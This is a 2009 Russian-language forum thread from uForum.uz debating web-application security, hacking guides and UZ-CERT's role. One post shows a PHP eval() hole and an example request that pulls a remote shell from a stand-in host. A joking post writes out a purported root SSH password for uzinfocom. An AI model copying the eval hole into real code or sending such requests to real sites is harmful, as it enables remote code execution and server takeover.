Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность > Инциденты
Знаете ли Вы, что ...
...инструкция по установке аватара описана в Правилах форума.
<< Предыдущий совет - Случайный совет - Следующий совет >>

Инциденты Обсуждение произошедших инцидентов информационной безопасности


Ответить

 
Опции темы Опции просмотра
Старый 18.06.2009 23:11   #21  
Аватар для CTAPu4OK
Оффлайн
Сообщений: 28
+ 1  4/2
– 0  1/1

Uzbekistan
Talking

Цитата:
Сообщение от Timur Rasulov Посмотреть сообщение
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.
С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал
PHP код:
<?
eval($test);
?>
Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...
Ответить 
Реклама и уведомления
Старый 19.06.2009 10:52   #22  
Known ID Group uParty Member
Аватар для Dolphin
Оффлайн
Imperium of Man
Inquisitor
Сообщений: 5,990
+ 5,680  4,442/2,033
– 128  137/102

Russian FederationОтправить сообщение для Dolphin с помощью ICQОтправить сообщение для Dolphin с помощью Skype™Facebook
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...
Цитата:
Сообщение от Timur Rasulov Посмотреть сообщение
Вначале нужно понять конструкцию и логику вебсервера
Ответить 
Старый 20.06.2009 05:40   #23  
Аватар для CTAPu4OK
Оффлайн
Сообщений: 28
+ 1  4/2
– 0  1/1

Uzbekistan
Цитата:
Сообщение от Timur Rasulov Посмотреть сообщение
Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...
Цитата:
Сообщение от Timur Rasulov Посмотреть сообщение
Вначале нужно понять конструкцию и логику вебсервера
И что вам это даст ?
У веб серверов логики не какой нету, это искусственный разум =)
Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще.
Ответить 
Старый 22.06.2009 14:54   #24  
Аватар для dmitry.uz
Оффлайн
Steinert ind
IT engineer
AKA:dinamit
Сообщений: 2,321
+ 1,227  2,630/967
– 30  41/37

UzbekistanОтправить сообщение для dmitry.uz с помощью ICQОтправить сообщение для dmitry.uz с помощью Skype™
Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать
Сломать могут по разному - нет универсальной защиты.
Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают.
Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах.
__________________
Size does matter....
Ответить 
Старый 11.09.2009 11:52   #25  
Аватар для Nestik
Оффлайн
ZOG
eminence grise
Сообщений: 2,258
+ 277  835/480
– 353  232/151

UzbekistanОтправить сообщение для Nestik с помощью ICQ
Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.
Ответить 
Старый 11.09.2009 13:45   #26  
Real ID Group
Аватар для Alexandr Pavlenko
Оффлайн
Сообщений: 261
+ 77  95/57
– 18  14/10

UzbekistanОтправить сообщение для Alexandr Pavlenko с помощью ICQОтправить сообщение для Alexandr Pavlenko с помощью Skype™
Цитата:
Сообщение от Evgeniy Sklyarevskiy Посмотреть сообщение
Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?
Оффтоп:
ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можна

Цитата:
Сообщение от Timur Naimov Посмотреть сообщение
Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...
Оффтоп:
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя


Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне.
я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Последний раз редактировалось Alexandr Pavlenko; 11.09.2009 в 13:53.
Ответить 
Старый 11.09.2009 14:10   #27  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от Alexandr Pavlenko Посмотреть сообщение
я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)
Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.
Ответить 
Старый 11.09.2009 15:16   #28  
Аватар для insider
Оффлайн
Engineer
Сообщений: 509
+ 45  169/112
– 0  12/9

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?
Оффтоп:

это типа на сайте будет раздел такого содержания:

Руководство для хакера...
как взломать uzinfocom ?
для этого надо подключится к серверу через ssh (putty)
в ввести в login: root , а password: 86hhyqiiy564g , после авторизации
сервер полностью ваш ....

Ответить 
Реклама и уведомления
Старый 11.09.2009 16:03   #29  
Real ID Group
Аватар для Alexandr Pavlenko
Оффлайн
Сообщений: 261
+ 77  95/57
– 18  14/10

UzbekistanОтправить сообщение для Alexandr Pavlenko с помощью ICQОтправить сообщение для Alexandr Pavlenko с помощью Skype™
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.
С деятельностью Службы UZ-CERT ознакомился...спасибо.
Цитата:
...консультативную и техническую поддержку пользователям в предотвращении угроз компьютерной безопасности.
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??


Цитата:
Сообщение от CTAPu4OK Посмотреть сообщение
У веб серверов логики не какой нету, это искусственный разум =)
Оффтоп:
Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича
Ответить 
Старый 11.09.2009 16:24   #30  
Open ID Group uParty Member
Аватар для Timur Naimov
Оффлайн
Сообщений: 412
+ 62  206/121
– 0  0/0

UzbekistanОтправить сообщение для Timur Naimov с помощью ICQОтправить сообщение для Timur Naimov с помощью YahooОтправить сообщение для Timur Naimov с помощью Skype™
Оффтоп:
Цитата:
Сообщение от Alexandr Pavlenko Посмотреть сообщение
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя
Кто Вам дал право переходить со мной на ты?
За горло брать будете лично Вы?
Могилку копать тоже?

Я вообще не понял к чему это все было сказано?
Ответить 
Ответить
Опции темы
Опции просмотра




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх